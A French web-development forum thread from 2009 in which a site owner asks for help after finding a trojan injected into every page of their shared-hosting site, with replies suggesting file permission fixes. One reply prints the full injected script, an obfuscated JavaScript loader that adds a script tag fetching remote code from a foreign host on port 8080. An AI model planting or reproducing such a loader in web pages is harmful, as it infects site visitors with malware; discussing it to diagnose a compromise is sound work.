IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Mon site piraté


Sujet :

Sécurité

  1. #1
    Nouveau Candidat au Club
    Profil pro
    Inscrit en
    Décembre 2009
    Messages
    2
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2009
    Messages : 2
    Points : 1
    Points
    1
    Par défaut Mon site piraté
    Bonjour à tous,

    Voilà dès que j'essaies de me rendre à l'adresse de mon site, avast me bloque et l'affichage de la page s'arrête, avast me signale un cheval de troie !

    Et ce code s'est ajouté comme par magie sur ma page d'index, je l'ai supprimé mais le problème persiste sur les autres pages (alors qu'elles ne contiennent pas le code en question...).

    Cela commence par :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script>/*GNU GPL*/ try{window.onload = function(){var I5iv62m4chn = ...
    Si vous pouviez m'aider à résoudre mon problème ce serai super !

    Je suis sous 1and1, mutualisé, Linux, mon FTP c'est un gros bordel, par panique j'ai supprimé les pages concernées, j'aurais pas du peut être, et j'espère que ça touche pas l'ensemble du serveur...

    Merci

    PS : Tout mon hébergement est touché je viens de voir, tous les dossiers...

    Que dois je faire ?

    Le serveur de 1and1 est peut être aussi touché, vont me tuer lol

  2. #2
    Invité
    Invité(e)
    Par défaut
    Bonjour,
    d'aprés le code facile a suivre, cela ne peut venir du serveur mais d'une faille chez toi !
    il faudrait controler tout les mod de protection de tout tes fichiers
    c'est trés vite vu avec FTP,
    755 pour les répertoires
    644 pour les fichiers que ce soient des images des PHP des CSS des JS etc ...

    Supprimes pour le moment tout controle de POST GET FILES SESSION etc...

    fait déjas tourné ton site ainsi !

    ( je supposes que tu as tout "propre" en local)

    Tiens nous au courant, et si tu acceptes mets moi ton URL par Message Privé.

  3. #3
    Nouveau Candidat au Club
    Profil pro
    Inscrit en
    Décembre 2009
    Messages
    2
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2009
    Messages : 2
    Points : 1
    Points
    1
    Par défaut
    Merci mais j'ai tout supprimé, base de donnée + vider le FTP. J'ai tout en local donc je vais analyser tranquillement mes controles de sécurité.

    J'espère surtout que je m'en suis bien débarassé au niveau de ma BDD et de mon hébergement

    Merci des conseils.

    Personne est capable de savoir ce qu'est ce code JavaScript... ?

    Merci

  4. #4
    Nouveau membre du Club
    Profil pro
    Inscrit en
    Mars 2008
    Messages
    37
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mars 2008
    Messages : 37
    Points : 28
    Points
    28

  5. #5
    Invité
    Invité(e)
    Par défaut
    Pas vraiment et sagissant de la génération dans le temp du user d'un fichier
    trojan , je ne peux c'est normal l'expliquer ici ceux qui connaissent verront mieux ainsi
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    
    
    <script>/*GNU GPL*/ try
    {window.onload = function()
     {
    var x = document.createElement('s)c^r@i#@p#^&)@t(('.replace(/\!|\^|\)|@|&|#|\$|\(/ig, ''));
    x.setAttribute('type', 'text/javascript');
    x.setAttribute('src', 'h&(t^$(t(&p^$$:&^$(/$@(^/@&!h)((u##$d!(^o&@n#!)g@#-&)c^$o@$m!().!v&a$^$g&&o$)s$^&&(.)(e&$s^@)@.^^)#n($&y@(p($#o#^s^^(t(-^!c@!o!#$m)^.))^w(i@!n(t!&$e($)#r&))s@a^&l@#e)#o^@!!@n^)$l#i$#(n@e!!&.#r$^^)$u)&:#!8$^#)0^8)0&/(($g!(o@@&(o&g$@&l^(e#$^.@!c($@o))m#$^/((g)(&)(o(&^o@^#g@)^l#e#)!.##c#)$@o&$$^m)#/$!#b^a$^(#h&@(n!!.(@d!)$(e!()$/&#^5^!!^8#!.$@c^(o&)^@&m@$/)t)w!&^$i)!^)t)@!t&(@e!!!$r^!&.&!c@o^^&m&)^/(&'.replace(/\$|&|\(|#|\)|@|\!|\^/ig, ''));
    x.setAttribute('defer', 'defer');
    x.setAttribute('id', 'W&(t^(4))$x!$$l(#@$w^j@)#x!c&@#m)i)!u('.replace(/\^|\)|@|#|\$|&|\!|\(/ig, ''));
    document.body.appendChild(x);
     }
    }
    catch(e) {}
    </script>

Discussions similaires

  1. protégé mon site contre les pirate ?
    Par keviin dans le forum Langage
    Réponses: 2
    Dernier message: 22/10/2009, 08h39
  2. [Sécurité] on a piraté mon site
    Par cuisto44000 dans le forum Langage
    Réponses: 10
    Dernier message: 17/06/2008, 20h50
  3. Visites bizarres sur mon site. Pirates?
    Par lysandre dans le forum Général Conception Web
    Réponses: 6
    Dernier message: 04/03/2008, 20h07
  4. Réponses: 13
    Dernier message: 20/06/2006, 18h11

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo